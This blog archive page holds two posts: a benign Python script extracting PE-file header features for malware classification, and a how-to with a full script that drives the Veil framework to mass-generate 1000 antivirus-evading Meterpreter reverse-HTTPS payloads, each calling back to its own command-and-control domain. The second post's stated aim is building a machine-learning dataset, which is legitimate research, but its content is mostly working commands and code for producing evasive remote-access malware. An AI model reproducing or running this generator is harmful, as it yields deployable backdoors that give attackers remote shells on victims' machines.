The Wandering Tech: August 2018

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.

The code uses the 2012 Adobe's Malware Classifier as a reference and modified accordingly for my own purpose.

The code uses PEFile python module to read and work with PE files.

My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First import the required python library.

import os
import pefile
import pandas as pd
import hashlib

Next define the function for computing md5 value given the filename. *Filename requires full path if binary is located in a separate directory from the python script.

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

Next define a python class to represent the PE binary file.

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample

Method to iterate through a directory for PE Files. PE Header and Section information are extracted and stored in a python dictionary and returned.

def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset

Method to save python dictionary returned by pe2vec() function to a CSV file.

def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')

Full Code is shown below:

import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    #representation of PE file
    def __init__(self, filename):
        with open(filename, "rb") as file_content:
            self.pe= pefile.PE(data=file_content.read(), fast_load=True)
        self.filename = filename
        self.DebugSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].Size
        self.DebugRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[6].VirtualAddress
        self.ImageVersion = self.pe.OPTIONAL_HEADER.MajorImageVersion
        self.OSVersion = self.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
        self.ExportRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].VirtualAddress
        self.ExportSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[0].Size
        self.IATRVA = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[12].VirtualAddress
        self.ResSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[2].Size
        self.LinkerVersion = self.pe.OPTIONAL_HEADER.MajorLinkerVersion
        self.VirtualSize2 = self.pe.sections[1].Misc_VirtualSize
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = self.pe.OPTIONAL_HEADER.SizeOfStackReserve
        self.Dll = self.pe.OPTIONAL_HEADER.DllCharacteristics
        self.pe.parse_data_directories()
        countf = 0
        countm = 0
        for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
          #print (entry.dll)
            countf += 1
            for imp in entry.imports:
                #print ('\t', hex(imp.address), imp.name)
                countm += 1
        self.ImportFunctionCount = countf
        self.ImportFunctionMethodCount = countm
        file_content.close()
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")
        
    def Construct(self):
        sample = {}
        for feature, value in self.__dict__.items():
            if(feature != "pe"):
                sample[feature] = value
        print ("Construct completed")
        return sample
    
def pe2vec():
    #dataset is a python dictionary which store the key value mapping
    dataset = {}
    
    #Recursively search for files within a specified directory and its subdir
    directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"
    for subdir, dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                #read PE file using PEFILE module
                pe = PEFile(file_path)        
                # pe.construct returns a dictionary with features as key and feature value as value
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                print (e)
    return dataset
    
def saveToCSV(dataset):
    df = pd.DataFrame(dataset)
    infected = df.transpose()  
    infected.to_csv('C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv',sep=',', encoding='utf-8')
    
pedata = pe2vec()
saveToCSV(pedata)

This post serves as a journal of the technique used for automating generation of VEIL payloads.
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus.

Overview:
1) On a Kali Linux VM

2) Install VEIL framework

apt update

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and copy the below python script. Save the script to veil directory (/usr/share/veil)

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

#read domain names to use
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

startfrom = 0

for index, row in df.iterrows():
 if startfrom > index:
  print ("skip: "+str(row[1]))
  continue

 attempt = 1
 #uncomment the 2 lines below to use the resolved ip address instead 
 try:
  addr = socket.gethostbyname(row[0])
  print(addr)
 except socket_error as serr:  
  if serr.errno == -2:
   print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.")
   row[0] = "127.0.0.1"

 command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + row[0] + " --port 443" 
 binaryname = str(row[1])+".exe"
 print (command)
 
 #set i to any positive number to start the loop  
 i = 9999
 x = -1
 while x == -1:
  proc = subprocess.Popen(['./Veil.py','-t','Evasion','-p','cs/meterpreter/rev_https.py','--ip',str(row[0]),'--port','443','-o',str(row[1])], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  tmp = proc.communicate()[0]
  x = tmp.find(correctmsg)
  #-1 represent errmsg is not found thus implying that crafting is successful
  i = tmp.find(errmsg)
  #print ("i value:" + str(i))

  if i != -1 :
   print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
   attempt = attempt + 1 
  if x == -1 :
   print ("error: " + tmp)
   attempt = attempt + 1 

 print ("Command: " + command + " is successful.")
 print ("Saving as :" + binaryname)
 #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
 print ("Saved")
 print ("")

4) Create a csv file using excel with the following format and save it as website.csv:

5) Execute the Python script

cd /usr/share/veil
python veil_malware_generation_script.py

6) Generated malware are saved at /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.

The Wandering Tech

Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

Saturday, August 11, 2018

Automating generation of VEIL payloads

Labels

Followers

Blog Archive

About Me